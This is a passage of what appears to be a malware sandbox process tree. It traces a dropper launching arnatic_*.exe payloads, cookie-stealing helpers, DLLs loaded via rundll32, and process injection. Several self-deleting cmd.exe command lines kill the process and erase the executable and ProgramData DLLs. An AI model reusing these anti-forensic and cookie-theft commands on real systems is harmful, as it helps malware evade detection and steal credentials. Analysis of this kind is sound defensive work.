                                                                                          • C:\Users\Admin\Documents\WIMyFLI5ed8qwkPx7zHtcmTM.exe
                                                                                            C:\Users\Admin\Documents\WIMyFLI5ed8qwkPx7zHtcmTM.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1072
                                                                                          • C:\Users\Admin\Documents\WIMyFLI5ed8qwkPx7zHtcmTM.exe
                                                                                            C:\Users\Admin\Documents\WIMyFLI5ed8qwkPx7zHtcmTM.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4852
                                                                                          • C:\Users\Admin\Documents\WIMyFLI5ed8qwkPx7zHtcmTM.exe
                                                                                            C:\Users\Admin\Documents\WIMyFLI5ed8qwkPx7zHtcmTM.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2644
                                                                                        • C:\Users\Admin\Documents\rlRnxtI61KSJWmagOSlNvrCN.exe
                                                                                          "C:\Users\Admin\Documents\rlRnxtI61KSJWmagOSlNvrCN.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:4172
                                                                                          • C:\Users\Admin\Documents\rlRnxtI61KSJWmagOSlNvrCN.exe
                                                                                            "C:\Users\Admin\Documents\rlRnxtI61KSJWmagOSlNvrCN.exe"
                                                                                            7⤵
                                                                                              PID:4892
                                                                                          • C:\Users\Admin\Documents\yxXFM3rnrZ9uTadWikhnMMcj.exe
                                                                                            "C:\Users\Admin\Documents\yxXFM3rnrZ9uTadWikhnMMcj.exe"
                                                                                            6⤵
                                                                                            • Drops file in Drivers directory
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in Program Files directory
                                                                                            PID:4276
                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                              7⤵
                                                                                                PID:6140
                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                  8⤵
                                                                                                  • Checks processor information in registry
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:5172
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5172.0.640345963\404145228" -parentBuildID 20200403170909 -prefsHandle 1148 -prefMapHandle 1196 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5172 "\\.\pipe\gecko-crash-server-pipe.5172" 1488 gpu
                                                                                                    9⤵
                                                                                                      PID:4884
                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5172.3.1104974339\967311388" -childID 1 -isForBrowser -prefsHandle 4072 -prefMapHandle 4068 -prefsLen 156 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5172 "\\.\pipe\gecko-crash-server-pipe.5172" 4084 tab
                                                                                                      9⤵
                                                                                                        PID:808
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5172.13.1890006910\1422287938" -childID 2 -isForBrowser -prefsHandle 2664 -prefMapHandle 2868 -prefsLen 7013 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5172 "\\.\pipe\gecko-crash-server-pipe.5172" 3984 tab
                                                                                                        9⤵
                                                                                                          PID:2200
                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5172.20.1982384272\1290949159" -childID 3 -isForBrowser -prefsHandle 4680 -prefMapHandle 2872 -prefsLen 8017 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5172 "\\.\pipe\gecko-crash-server-pipe.5172" 2908 tab
                                                                                                          9⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5108
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                      7⤵
                                                                                                      • Enumerates system info in registry
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      PID:5500
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0x64,0xd4,0x7ffae9044f50,0x7ffae9044f60,0x7ffae9044f70
                                                                                                        8⤵
                                                                                                          PID:1380
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1496 /prefetch:2
                                                                                                          8⤵
                                                                                                            PID:3692
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1828 /prefetch:8
                                                                                                            8⤵
                                                                                                              PID:4100
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2160 /prefetch:8
                                                                                                              8⤵
                                                                                                                PID:5548
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2544 /prefetch:1
                                                                                                                8⤵
                                                                                                                  PID:5560
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2512 /prefetch:1
                                                                                                                  8⤵
                                                                                                                    PID:184
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
                                                                                                                    8⤵
                                                                                                                      PID:6192
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
                                                                                                                      8⤵
                                                                                                                        PID:6204
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3800 /prefetch:1
                                                                                                                        8⤵
                                                                                                                          PID:6248
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
                                                                                                                          8⤵
                                                                                                                            PID:6328
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4920 /prefetch:8
                                                                                                                            8⤵
                                                                                                                              PID:6780
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 /prefetch:8
                                                                                                                              8⤵
                                                                                                                                PID:1236
                                                                                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                                                                8⤵
                                                                                                                                  PID:6936
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x7c,0x248,0x7ff7abaea890,0x7ff7abaea8a0,0x7ff7abaea8b0
                                                                                                                                    9⤵
                                                                                                                                      PID:6956
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=996 /prefetch:8
                                                                                                                                    8⤵
                                                                                                                                      PID:6540
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=772 /prefetch:8
                                                                                                                                      8⤵
                                                                                                                                        PID:6476
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2476 /prefetch:8
                                                                                                                                        8⤵
                                                                                                                                          PID:5892
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1484,2046181220564732610,9286735674304736802,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4948 /prefetch:2
                                                                                                                                          8⤵
                                                                                                                                            PID:5384
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "cmd.exe" /C taskkill /F /PID 4276 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\yxXFM3rnrZ9uTadWikhnMMcj.exe"
                                                                                                                                          7⤵
                                                                                                                                            PID:4252
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /F /PID 4276
                                                                                                                                              8⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:3972
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "cmd.exe" /C taskkill /F /PID 4276 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\yxXFM3rnrZ9uTadWikhnMMcj.exe"
                                                                                                                                            7⤵
                                                                                                                                              PID:3916
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                taskkill /F /PID 4276
                                                                                                                                                8⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:5912
                                                                                                                                          • C:\Users\Admin\Documents\I0tcDLDcJ6SJlIRDMUOLOA2r.exe
                                                                                                                                            "C:\Users\Admin\Documents\I0tcDLDcJ6SJlIRDMUOLOA2r.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4896
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                              7⤵
                                                                                                                                                PID:4876
                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  8⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                  PID:4892
                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                  taskkill /f /im chrome.exe
                                                                                                                                                  8⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:5276
                                                                                                                                            • C:\Users\Admin\Documents\pxVarRpAjX7c8F8Y2fGmOCcs.exe
                                                                                                                                              "C:\Users\Admin\Documents\pxVarRpAjX7c8F8Y2fGmOCcs.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4836
                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                                                                                                                                7⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4996
                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                                7⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4052
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                  8⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4916
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                  8⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:6132
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                  8⤵
                                                                                                                                                    PID:4164
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                    8⤵
                                                                                                                                                      PID:5004
                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    PID:4872
                                                                                                                                                    • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                      "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
                                                                                                                                                      8⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:5644
                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                    7⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                    PID:2244
                                                                                                                                                • C:\Users\Admin\Documents\qtx3R4Nu7Fi4n2aRsWRhJCVh.exe
                                                                                                                                                  "C:\Users\Admin\Documents\qtx3R4Nu7Fi4n2aRsWRhJCVh.exe"
                                                                                                                                                  6⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4100
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "qtx3R4Nu7Fi4n2aRsWRhJCVh.exe" /f & erase "C:\Users\Admin\Documents\qtx3R4Nu7Fi4n2aRsWRhJCVh.exe" & exit
                                                                                                                                                    7⤵
                                                                                                                                                      PID:5400
                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                        taskkill /im "qtx3R4Nu7Fi4n2aRsWRhJCVh.exe" /f
                                                                                                                                                        8⤵
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:5536
                                                                                                                                                  • C:\Users\Admin\Documents\bzTXzrp1_ShLIg5wbCm52tqE.exe
                                                                                                                                                    "C:\Users\Admin\Documents\bzTXzrp1_ShLIg5wbCm52tqE.exe"
                                                                                                                                                    6⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    PID:1504
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im bzTXzrp1_ShLIg5wbCm52tqE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\bzTXzrp1_ShLIg5wbCm52tqE.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                      7⤵
                                                                                                                                                        PID:5192
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /im bzTXzrp1_ShLIg5wbCm52tqE.exe /f
                                                                                                                                                          8⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:5548
                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                          timeout /t 6
                                                                                                                                                          8⤵
                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                          PID:5824
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c arnatic_7.exe
                                                                                                                                                  4⤵
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:3084
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8280C4F4\arnatic_7.exe
                                                                                                                                                    arnatic_7.exe
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:2124
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8280C4F4\arnatic_7.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zS8280C4F4\arnatic_7.exe
                                                                                                                                                      6⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:3812
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c arnatic_4.exe
                                                                                                                                                  4⤵
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:348
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8280C4F4\arnatic_4.exe
                                                                                                                                                    arnatic_4.exe
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:2144
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                      6⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:3768
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                      6⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:4544
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                      6⤵
                                                                                                                                                        PID:6368
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                        6⤵
                                                                                                                                                          PID:6312
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c arnatic_2.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:3668
                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                PID:1112
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                  2⤵
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  PID:4032
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8280C4F4\arnatic_2.exe
                                                                                                                                                arnatic_2.exe
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                PID:2696
                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                1⤵
                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                PID:5032
                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                  2⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:1296
                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                1⤵
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:4352
                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                PID:5684
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3896.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3896.exe
                                                                                                                                                1⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                PID:2784
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3EA2.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3EA2.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:5032
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\452B.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\452B.exe
                                                                                                                                                  1⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                  PID:6664
                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:6528
                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5776
                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:6656
                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                        PID:6844
                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:6672
                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                          1⤵
                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                          PID:6688
                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5124
                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:6896
                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:6780
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\46BE.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\46BE.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              PID:6600
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 46BE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\46BE.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5856
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    taskkill /im 46BE.exe /f
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:3328
